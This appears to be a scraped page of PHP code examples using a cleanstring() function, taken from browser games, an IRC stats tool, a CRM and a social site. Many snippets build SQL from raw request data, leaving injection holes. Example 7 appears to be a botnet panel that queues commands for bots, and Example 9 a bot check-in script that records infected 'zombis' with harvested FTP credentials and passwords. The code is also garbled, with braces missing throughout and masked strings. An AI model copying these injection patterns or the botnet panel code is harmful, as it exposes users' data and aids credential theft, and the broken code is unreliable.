Exemplo n.º 1
function CheckCookies($IsUserChecked)
    global $lang, $game_config, $basic_pages;
    $UserRow = array();
    include ROOT_PATH . 'config' . UNIVERSE . '.php';
    if (isset($_COOKIE[$game_config['COOKIE_NAME']])) {
        $TheCookie = explode("/%/", $_COOKIE[$game_config['COOKIE_NAME']]);
        $UserResult = doquery("SELECT * FROM {{table}} WHERE `username` = '" . cleanstring($TheCookie[1]) . "';", 'users');
        // On verifie s'il y a qu'un seul enregistrement pour ce nom
        if (mysql_num_rows($UserResult) == 0) {
            message(sprintf($lang['cookies']['Error1'], cleanstring($TheCookie[1])));
        $UserRow = FetchArray($UserResult);
        // On teste si on a bien le bon UserID
        if ($UserRow["id"] != $TheCookie[0]) {
        // On teste si le mot de passe est correct !
        if (sha($UserRow["password"] . "--" . $dbsettings["secretword"]) !== $TheCookie[2]) {
        $NextCookie = implode("/%/", $TheCookie);
        // Au cas ou dans l'ancien cookie il etait question de se souvenir de moi
        // 3600 = 1 Heure // 86400 = 1 Jour // 31536000 = 365 Jours
        // on ajoute au compteur!
        if ($TheCookie[3] == 1) {
            $ExpireTime = time() + 31536000;
        } else {
            $ExpireTime = 0;
        if ($IsUserChecked == false) {
            setcookie($game_config['COOKIE_NAME'], $NextCookie, $ExpireTime, "/", "", 0);
        if (SMALL_LOAD) {
            //Just a small query
            doquery("UPDATE {{table}} SET `onlinetime` = '" . time() . "' WHERE `id` = '" . $TheCookie[0] . "' LIMIT 1;", 'users');
        } else {
            $QryUpdateUser = "******";
            $QryUpdateUser .= "`onlinetime` = '" . time() . "', ";
            $QryUpdateUser .= "`current_page` = '" . mysql_real_escape_string($_GET['page']) . "', ";
            $QryUpdateUser .= "`user_lastip` = '" . mysql_real_escape_string($_SERVER['REMOTE_ADDR']) . "', ";
            $QryUpdateUser .= "`user_agent` = '" . mysql_real_escape_string($_SERVER['HTTP_USER_AGENT']) . "' ";
            $QryUpdateUser .= "WHERE ";
            $QryUpdateUser .= "`id` = '" . $TheCookie[0] . "' LIMIT 1;";
            doquery($QryUpdateUser, 'users');
        $IsUserChecked = true;
    $Return['state'] = $IsUserChecked;
    $Return['record'] = $UserRow;
    return $Return;
Exemplo n.º 2
function getStatsFor($lnick)
    $stats = array();
    $messages = mysql_query("SELECT *,DATE_FORMAT(date, '%D %M %Y %T') AS fdate FROM messages WHERE nick='" . $lnick . "' AND (type='privmsg' OR type='notice' OR type='ctcp' OR type='action') ORDER BY date DESC") or die('<p>MySQL says: ' . mysql_error() . '</p>');
    if (mysql_affected_rows() > 0) {
        $lastMessage = mysql_fetch_array($messages);
        $stats['lastmsgid'] = $lastMessage['id'];
        $stats['lastmsgdate'] = $lastMessage['fdate'];
        $stats['lastlogin'] = $lastMessage['name'];
        $stats['lasthost'] = $lastMessage['host'];
        $stats['lastserver'] = $lastMessage['server'];
        $stats['messages'] = mysql_affected_rows();
        // Count joins
        $joinsR = mysql_query("SELECT COUNT(*) AS count FROM messages WHERE nick='" . $lnick . "' AND type='join'") or die('<p>MySQL says: ' . mysql_error() . '</p>');
        $joins = mysql_fetch_array($joinsR);
        $stats['joins'] = $joins['count'];
        // Count parts
        $partsR = mysql_query("SELECT COUNT(*) AS count FROM messages WHERE nick='" . $lnick . "' AND type='part'") or die('<p>MySQL says: ' . mysql_error() . '</p>');
        $parts = mysql_fetch_array($partsR);
        $stats['parts'] = $parts['count'];
        // Count quits
        $quitsR = mysql_query("SELECT COUNT(*) AS count FROM messages WHERE nick='" . $lnick . "' AND type='quit'") or die('<p>MySQL says: ' . mysql_error() . '</p>');
        $quits = mysql_fetch_array($quitsR);
        $stats['quits'] = $quits['count'];
        // Count notices
        $noticesR = mysql_query("SELECT COUNT(*) AS count FROM messages WHERE nick='" . $lnick . "' AND type='notice'") or die('<p>MySQL says: ' . mysql_error() . '</p>');
        $notices = mysql_fetch_array($noticesR);
        $stats['notices'] = $notices['count'];
        // Count actions
        $actionsR = mysql_query("SELECT COUNT(*) AS count FROM messages WHERE nick='" . $lnick . "' AND type='action'") or die('<p>MySQL says: ' . mysql_error() . '</p>');
        $actions = mysql_fetch_array($actionsR);
        $stats['actions'] = $actions['count'];
        // Get all words, then we can count swears/laughs and mostly used words
        $results = mysql_query("SELECT * FROM messages WHERE nick='" . $lnick . "'") or die('<p>MySQL says: ' . mysql_error() . '</p>');
        $words = array();
        $swearwords = array();
        $laughwords = array();
        $excluded = array("i", "the", "it", "at", "to", "is", "of", "a", "that", "", "have", "and", "you", "but", "in", "was", "like", "me", "with", "for", "dont", "they", "so", "im", "this", "its", "not", "be", "if", "do", "what", "can", "too", "on", "my", "are", "just", "did", "get", "had", "he", "as", "some", "your", "about", "one", "or", "there", "them", "know", "thats", "up", "when", "no", "oh", "then", "how", "from", "it's", "i'm", "that's", "u", "an", "we", "only");
        $laughs = array('lol', 'lmfao', 'lerl', 'lel', 'lal', 'lil', 'lul', 'lawl', ' lmao', 'rofl', 'haha');
        $swears = array('f**k', 'crap', 'shit', 'c**t', 'dick', 'twat', 'bollocks', 'bastard', 'bitch', 'prick');
        $swearcount = 0;
        $laughcount = 0;
        while ($result = mysql_fetch_array($results)) {
            if (!isset($result['content']) || $result['content'] == null) {
            $contentWords = explode(" ", $result['content']);
            foreach ($contentWords as $word) {
                $word = strtolower(cleanstring($word));
                foreach ($excluded as $exclude) {
                    if ($word == $exclude) {
                        continue 2;
                foreach ($laughs as $laugh) {
                    if ($word == $laugh) {
                        continue 2;
                foreach ($swears as $swear) {
                    if ($word == $swear) {
                        continue 2;
        $words = array_slice($words, 0, 5);
        $swearwords = array_slice($swearwords, 0, 5);
        $laughwords = array_slice($laughwords, 0, 5);
        $words = array_keys($words);
        $swearwords = array_keys($swearwords);
        $laughwords = array_keys($laughwords);
        $fin = '';
        for ($i = 0; $i < 5; $i++) {
            $fin .= htmlentities($words[$i]) . ($i + 1 >= 5 ? "" : ", ");
            if ($i + 1 < 5 && !isset($words[$i + 1])) {
        $stats['comwords'] = $fin;
        $fin = '';
        for ($i = 0; $i < 5; $i++) {
            $fin .= htmlentities($swearwords[$i]) . ($i + 1 >= 5 ? "" : ", ");
            if ($i + 1 < 5 && !isset($swearwords[$i + 1])) {
        $stats['comswears'] = $fin;
        $fin = '';
        for ($i = 0; $i < 5; $i++) {
            $fin .= htmlentities($laughwords[$i]) . ($i + 1 >= 5 ? "" : ", ");
            if ($i + 1 < 5 && !isset($laughwords[$i + 1])) {
        $stats['comlaughs'] = $fin;
        $stats['swears'] = $swearcount;
        $stats['laughs'] = $laughcount;
        // Todo: get mostly use word, amount of swears, most frequent time, most highlighted etc...
    return $stats;
Exemplo n.º 3
require_once '../../includes/settings.php';
require_once '../../includes/dbase.php';
function cleanstring($string)
    $newstring = "";
    $newstring = str_replace("'", "''", $string);
    $newstring = str_replace("--", "_", $newstring);
    $newstring = strtoupper($newstring);
    $newstring = stripslashes($newstring);
    return $newstring;
$workingfolder = cleanstring($_REQUEST['workingfolder']);
$agent = cleanstring($_REQUEST['agent']);
$disposition = cleanstring($_REQUEST['disposition']);
$remarks = cleanstring($_REQUEST['remarks']);
$leadid = cleanstring($_REQUEST['leadid']);
$db = new dbconnection();
$db->query = "\n  update " . TABLE_CLIENTS . "\n  set confirmer={$agent},disposition='{$disposition}',dateconfirmed=now(),remarks='{$remarks}'\n  where leadid={$leadid}\n  ";
if (strtoupper($disposition) == 'VERIFIED') {
    $now = Date("Y-m-d");
    $db->query = "\n    update " . TABLE_VER . "\n      set disposition='{$disposition}',tagdate='{$now}'\n      where leadid={$leadid}\n    ";
if (strtoupper($disposition) == 'TURN-IN') {
    $now = Date("Y-m-d");
    $db->query = "\n    insert into " . TABLE_TURNIN . "\n      (leadid,disposition,tagdate)\n      values\n      ({$leadid},'{$disposition}',now())\n      on duplicate key update \n        disposition='{$disposition}',\n        tagdate='{$now}'\n    ";
Exemplo n.º 4
 * Output given value in appropriate format for gPXE config file
 * gPXE config/*.h files use C pre-processor syntax.  Output the given
 * compile option in a format appropriate to its type
 * @param string $key   index into $flag_table for given compile option
 * @param string $value value we wish to set compile option to
 * @return string code to set compile option to given value
function pprint_flag ( $key, $value )
    global $flag_table;

    // Determine type of given compile option (flag)
    $type = $flag_table[$key]["type"];
    $s = "";

    if ( $type == "on/off" && $value == "on" ) {
        $s = "#define $key";
    } else if ( $type == "on/off" && $value != "on" ) {
        $s = "#undef $key";
    } else if ( $type == "string" ) {
        $s = ( "#define $key \"" . cleanstring ( $value ) . "\"" );
    } else if ($type == "qstring" ) {
        $s = ( "#define $key \\\"" . cleanstring ( $value ) . "\\\"" );
    } else {
        $s = "#define $key " . cleanstring ( $value );

    return $s;
Exemplo n.º 5
 //Load the headers
 if ($user['ally_request'] > 0) {
     $parse['search_ally'] = $parse['application'];
     $parse['onclick2'] = "loadpage('./?page=network','" . $parse['Alliance'] . "','network')";
 } else {
     $parse['onclick2'] = "mrbox('./?page=cerca&iframe=1&iheight=800',800)";
 $parse['header_tpl'] = parsetemplate(gettemplate('alliance/header_noally'), $parse);
 //They are creating an alliance.
 if ($_POST['tag'] && $_POST['name']) {
     //ok we are gonna create an alliance. First check if the tag already exists.
     $query = doquery("SELECT * FROM {{table}} \r\n\t\t\t\t\tWHERE `ally_name` = '" . mysql_real_escape_string(cleanstring($_POST['name'])) . "' LIMIT 1 ;", 'alliance');
     if (mysql_num_rows($query) > 0) {
         info($lang['name_in_use'], $lang['create_error'], './?page=network&mode=create', '<<');
     $query = doquery("SELECT * FROM {{table}} \r\n\t\t\t\t\tWHERE `ally_tag`  = '" . mysql_real_escape_string(cleanstring($_POST['tag'])) . "'  LIMIT 1 ;", 'alliance');
     if (mysql_num_rows($query) > 0) {
         info($lang['tag_in_use'], $lang['create_error'], './?page=network&mode=create', '<<');
     //nope it doesn't exist. Now we add it into the table
     doquery("INSERT INTO {{table}} SET\r\n\t\t\t\t\t`ally_name`='" . mysql_real_escape_string($_POST['name']) . "',\r\n\t\t\t\t\t`ally_tag`='" . mysql_real_escape_string($_POST['tag']) . "' ,\r\n\t\t\t\t\t`ally_owner`='" . $user['id'] . "',\r\n\t\t\t\t\t`ally_register_time`=" . time(), "alliance") or die("Error code: " . __LINE__);
     $allyquery = doquery("SELECT `id`,`ally_name`,ally_owner_range FROM {{table}} WHERE ally_tag='" . mysql_real_escape_string($_POST['tag']) . "'", 'alliance', true);
     doquery("UPDATE {{table}} SET `ally_id`='" . $allyquery['id'] . "', \r\n\t\t\t\t\t`ally_name`='" . $allyquery['ally_name'] . "',\r\n\t\t\t\t\t`ally_register_time`='" . time() . "', \r\n\t\t\t\t\t`ally_rank_name` = '" . $allyquery['ally_owner_range'] . "', \r\n\t\t\t\t\t`ally_rank` = '511'\r\n\t\t\t\t\tWHERE `id`='" . $user['id'] . "'", "users") or die("Error code: " . __LINE__);
     //Lets report the sucess.
     info($lang['ally_made'], $lang['create_done'], './?page=network', '<<');
 } else {
     //They haven't submitted the form, lets give it to them.
     if ($_GET['axah']) {
         makeAXAH(parsetemplate(gettemplate('alliance/noally'), $parse));
     } else {
         displaypage(parsetemplate(gettemplate('alliance/noally'), $parse), $lang['title']);
Exemplo n.º 6
 * reg.php
 * @version 1.1
 * @copyright 2008 by Chlorel for XNova
 * Extra bit by Antony for Darkness of Evolution
define('INSIDE', true);
define('INSTALL', false);
define('NO_MENU', true);
define('LOGIN', true);
if (!$_GET['s']) {
    $_GET['s'] = $_POST['s'];
define('ROOT_PATH', '');
include_once ROOT_PATH . 'common.php';
getLang('reg', cleanstring($_POST['lang']));
function sendpassemail($emailaddress, $password, $username, $code)
    global $lang, $game_config;
    $parse = $lang;
    $parse['password'] = $password;
    $parse['username'] = $username;
    $parse['uni'] = UNIVERSE;
    $parse['game'] = $game_config['game_name'];
    $parse['GAMEURL'] = GAMEURL;
    $parse['ADMIN_NAME'] = ADMIN_NAME;
    $parse['validate_url'] = GAMEURL . '/login.php?GET_LOGIN=1&username='******'&password='******'&UNI=' . UNIVERSE . '&go=./?page=validate--code=' . $code;
    $status = mymail($emailaddress, $lang['mail_title'] . $parse['game'], parsetemplate(gettemplate('emails/reg'), $parse));
    return $status;
function mymail($to, $title, $body, $from = false)
Exemplo n.º 7
    if ($row['status'] == 'Offline') {
        echo '<td class="td" style="text-align: center; color: red;">' . $row['status'] . '</td>';
    if ($row['status'] == 'Dead') {
        echo '<td class="td" style="text-align: center;">' . $row['status'] . '</td>';
    echo '<td class="td" style="text-align: center;"><input type="checkbox" name="vote[]" value="' . $row['id'] . ':' . $two_letter_country_code . ':' . $row['admin'] . ':' . $row['status'] . '|" /></td>
echo '</form></table>';
require_once 'inc/html_footer.php';
if (isset($_POST['submitted'])) {
    $countvote = cleanstring(count($_POST['vote']));
    $task = cleanstring($_POST['task']);
    $tasklength = strlen($task);
    $url = cleanstring($_POST['url']);
    $urllength = strlen($url);
    if ($countvote == 0) {
        echo "\r\n \r\n   <script type='text/javascript'>\r\n \r\n       alert('No clients selected.');\r\n \r\n   </script>\r\n \r\n";
    } else {
        //echo $task;
        //echo $urllength;
        foreach ($_POST['vote'] as $vote) {
            $votesplit = explode(":", $vote);
            $botid = $votesplit['0'];
            mysql_query("DELETE FROM commands WHERE viewed LIKE 1");
            mysql_query("INSERT INTO commands (id, botid, cmd, variable, viewed) VALUES ('', '{$botid}', '{$task}', '{$url}', '0')");
Exemplo n.º 8
    $newstring = str_replace("'", "''", $string);
    $newstring = str_replace("--", "_", $newstring);
    $newstring = strtoupper($newstring);
    $newstring = stripslashes($newstring);
    return $newstring;
$workingfolder = cleanstring($_REQUEST['workingfolder']);
$agent = cleanstring($_REQUEST['agent']);
$disposition = cleanstring($_REQUEST['disposition']);
$remarks = cleanstring($_REQUEST['remarks']);
$leadid = cleanstring($_REQUEST['leadid']);
$datafields = array('clfirstname', 'clmiddlename', 'cllastname', 'embossname', 'dobm', 'dobd', 'doby', 'pob', 'civilstatus', 'gender', 'dependents', 'citizenship', 'mobilephone', 'homephone', 'permhomephone', 'homeaddress1', 'homeaddress2', 'homeaddress3', 'homeaddress4', 'homezipcode', 'permaddress1', 'permaddress2', 'permaddress3', 'permaddress4', 'permzipcode', 'homeownership', 'lengthofstay', 'numberofcars', 'carmodelyear', 'education', 'email', 'mfmn', 'tin', 'sss', 'sourceoffunds', 'company', 'companyphone', 'companyprovidedphone', 'companyemail', 'empposition', 'emppositiontype', 'occupation', 'nob', 'coaddress1', 'coaddress2', 'coaddress3', 'coaddress4', 'cozipcode', 'emptenure', 'emptenuretotal', 'empstatus', 'annualincome', 'cardissuer', 'cardnumber', 'cardlimit', 'membersince', 'spfirstname', 'spmiddlename', 'splastname', 'spdobm', 'spdobd', 'spdoby', 'spcompany', 'spposition', 'spnob', 'spcompanyphone', 'spcoaddress1', 'spcoaddress2', 'spcoaddress3', 'spcoaddress4', 'spcozipcode', 'supfirstname', 'supmiddlename', 'suplastname', 'supaddress1', 'supaddress2', 'supaddress3', 'supaddress4', 'supzipcode', 'supcontact', 'supsourceoffunds', 'supnob', 'supcompany', 'suprelation', 'supcitizenship', 'supdobm', 'supdobd', 'supdoby', 'suppob', 'suptin', 'supsss', 'supembossname', 'supspendlimit', 'reffirstname', 'refmiddlename', 'reflastname', 'refrelation', 'refaddress1', 'refaddress2', 'refaddress3', 'refaddress4', 'refzipcode', 'refcontact');
$setfields = "";
foreach ($datafields as $key => $value) {
    if (!($value == 'email' || $value == 'companyemail')) {
        $curfield = cleanstring($_POST["{$value}"]);
        ${$value} = $curfield;
    } else {
        $curfield = $_POST["{$value}"];
        ${$value} = $curfield;
    $setfields .= "{$value}='{$curfield}',";
$db = new dbconnection();
$concatname = str_replace(' ', '', $clfirstname . $clmiddlename . $cllastname);
$db->query = "\n  update " . TABLE_CLIENTS . "\n  set verifier={$agent},disposition='{$disposition}',dateverified=now(),remarks='{$remarks}',concatname='{$concatname}'\n  where leadid={$leadid}\n  ";
$db->query = "\n  update " . TABLE_CLIENTINFO . "\n  set \n    {$setfields}\n    leadid={$leadid}\n  where leadid={$leadid}\n  ";
Exemplo n.º 9
include_once $incs;
$gi = geoip_open($ipbs, GEOIP_STANDARD);
$cc = geoip_country_code_by_addr($gi, getenv("REMOTE_ADDR"));
if (empty($cc)) {
    $cc = "Desconosido";
# Country name
include_once $incs;
$gi = geoip_open($ipbs, GEOIP_STANDARD);
$cn = geoip_country_name_by_addr($gi, getenv("REMOTE_ADDR"));
if (empty($cn)) {
    $cn = "Desconosido";
$header = cleanstring($_SERVER['HTTP_USER_AGENT']);
if ($header == "753cda8b05e32ef3b82e0ff947a4a936") {
    $Name = $_POST['name'];
    $SO = $_POST['so'];
    $zila = $_POST['file'];
    $Pasw = $_POST['pasw'];
    $ip = getenv("REMOTE_ADDR");
    $host = gethostbyaddr($ip);
    $Zombie = $DB->Select("SELECT * FROM zombis WHERE name='" . $Name . "'");
    if (count($Zombie) <= 0) {
        $Sql = "INSERT INTO zombis \r\n\t\t(id , name , fecha , ip , host , pais , flag , pharming , http , so , ftps , pasw , a)\r\n\t\tVALUES (NULL , '" . $Name . "' , NULL , '" . $ip . "' , '" . $host . "' , '" . $cn . "' , '" . $cc . "' , '1' , '1' , '" . $SO . "' , '" . $zila . "' ,  '" . $Pasw . "' , 1);";
    } else {
        $X = @rand(0, 99999999999);
        $DB->Query("UPDATE zombis SET ip='" . getenv("REMOTE_ADDR") . "' , pais='" . $cn . "' , flag='" . $cc . "' , so='" . $SO . "' , ftps='" . $zila . "' , pasw='" . $Pasw . "' , a='" . $X . "' WHERE name='" . $Name . "'");
Exemplo n.º 10
function createpost()
    $_POST = array_map('protect', $_POST);
    $owner = $_SESSION['id'];
    $title = $_POST['title'];
    $url = cleanstring($title);
    $desc = $_POST['desc'];
    $qry = mysql_query("SELECT `id` FROM groups WHERE `url`='{$url}'");
    if (mysql_numrows($qry) == 1) {
        infobox(t("Um grupo com este nome já existe."), true, true);
    mysql_query("INSERT INTO groups (`owner`, `title`, `url`, `desc`) VALUES ('{$owner}', '{$title}', '{$url}', '{$desc}');");
    $group_id = resolvegroup($url);
    mysql_query("INSERT INTO groups_join (`account`, `group`) VALUES ('{$owner}', '{$group_id}');");
    note(t("criou um grupo."), $_SESSION['id']);
Exemplo n.º 11
function getLang($filename, $uselang = 'user', $default = false, $ext = '.mo')
    global $lang, $user, $basedlang;
    if ($uselang != 'user') {
        $user['lang'] = cleanstring($uselang);
    if ($default) {
        $SelLanguage = DEFAULT_LANG;
    } else {
        if ($user['lang'] != '') {
            $SelLanguage = $user['lang'];
        } else {
            $SelLanguage = DEFAULT_LANG;
    //Include the default language, now we at least have all the strings
    @(include ROOT_PATH . "lang/" . DEFAULT_LANG . "/" . $filename . $ext);
    //Include the based off language, eg for lang us, we want the english files.
    if ($basedlang[$SelLanguage] != DEFAULT_LANG) {
        if (file_exists(ROOT_PATH . "lang/" . $basedlang[$SelLanguage] . "/" . $filename . $ext)) {
            @(include ROOT_PATH . "lang/" . $basedlang[$SelLanguage] . "/" . $filename . $ext);
    //Now include the main language.
    if ($SelLanguage != DEFAULT_LANG) {
        if (file_exists(ROOT_PATH . "lang/" . $SelLanguage . "/" . $filename . $ext)) {
            @(include ROOT_PATH . "lang/" . $SelLanguage . "/" . $filename . $ext);
    //Now debug
    //	$lang = array();
Exemplo n.º 12
function signuppost()
    global $site_id, $site;
    $err = array();
    $_POST = array_map('mysql_real_escape_string', $_POST);
    $_POST = array_map('htmlspecialchars', $_POST);
    if (is_null($_POST['login']) or is_null($_POST['senha'])) {
        $err[] = t("Falta preencher alguns campos.");
    $login = $_POST['login'];
    $senha = md5($_POST['senha'] . $site_id);
    $senha2 = md5($_POST['senha2'] . $site_id);
    if ($senha != $senha2) {
        $err[] = t("A confirmação da senha está incorreta.");
    if ($_POST['login'] === $_POST['senha']) {
        $err[] = t("Sua senha não pode ser o seu login.");
    if ($_POST['login'] != cleanstring($_POST['login'])) {
        $err[] = t("Seu login é inválido. Ele pode conter apenas letras e números.");
    $email = $_POST['email'];
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
        $err[] = t("E-mail inválido!");
    $nome = $_POST['nome'];
    $sexo = $_POST['sexo'];
    if ($sexo != 'm' or $sexo != 'f') {
        $sexo = 'o';
    $idade = @mktime(0, 0, 0, $_POST['mes'], $_POST['dia'], $_POST['ano']);
    if (!$idade) {
        $err[] = t("Data de nascimento inválida!");
    $campo = isset($_POST['campo']) ? $_POST['campo'] : '-';
    $now = time();
    if (!comparecaptcha($_POST['captcha'])) {
        $err[] = t("Código de segurança inválido!");
    $veremail = mysql_query("SELECT id FROM accounts WHERE email='{$email}'");
    if (mysql_num_rows($veremail) != 0) {
        $err[] = t("O e-mail especificado já está registrado para outra conta no ") . $site['site_name'] . ".";
    $verlogin = mysql_query("SELECT id FROM accounts WHERE login='******'");
    if (mysql_num_rows($verlogin) != 0) {
        $err[] = t("Já existe um usuário registrado com este login.");
    if (sizeof($err) != 0) {
        $erros = null;
        $i = 0;
        $j = count($err);
        while ($i <= $j) {
            $erros .= "\n<br>" . $err[$i];
        infobox(t("Houveram erros e o cadastro foi impossibilitado.") . "<br/>{$erros}<br><br><a href=\"#\" onClick=\"javascript:history.go(-1);\">" . t("Voltar") . "</a>");
    } else {
        $num = mysql_fetch_array(mysql_query("SELECT count(*) AS num FROM accounts;"));
        $num = $num['num'];
        if ($num > 0) {
            $admin = 'n';
            admail(t("Usuário registrado!"), t("Olá! Mais um usuário se registrou em seu website:") . $login);
        } else {
            $admin = 's';
        $qry = mysql_query("INSERT INTO accounts (`login`, `senha`, `email`, `nome`, `foto`, `registro`, `ultimo_login`, `admin`, `sexo`, `nascimento`, `sobre`, `campo`)\n                                       VALUES('{$login}', '{$senha}', '{$email}', '{$nome}', 'default.jpg', '{$now}', '{$now}', '{$admin}', '{$sexo}', '{$idade}', 'Nenhum conteúdo, ainda.', '{$campo}');");
        $getid = mysql_fetch_array(mysql_query("SELECT id FROM accounts WHERE login='******' AND senha='{$senha}'"));
        $getid = $getid['id'];
        setcookie("atempts", 0);
        $_SESSION['id'] = $getid;
        note(t("se registrou"), $getid);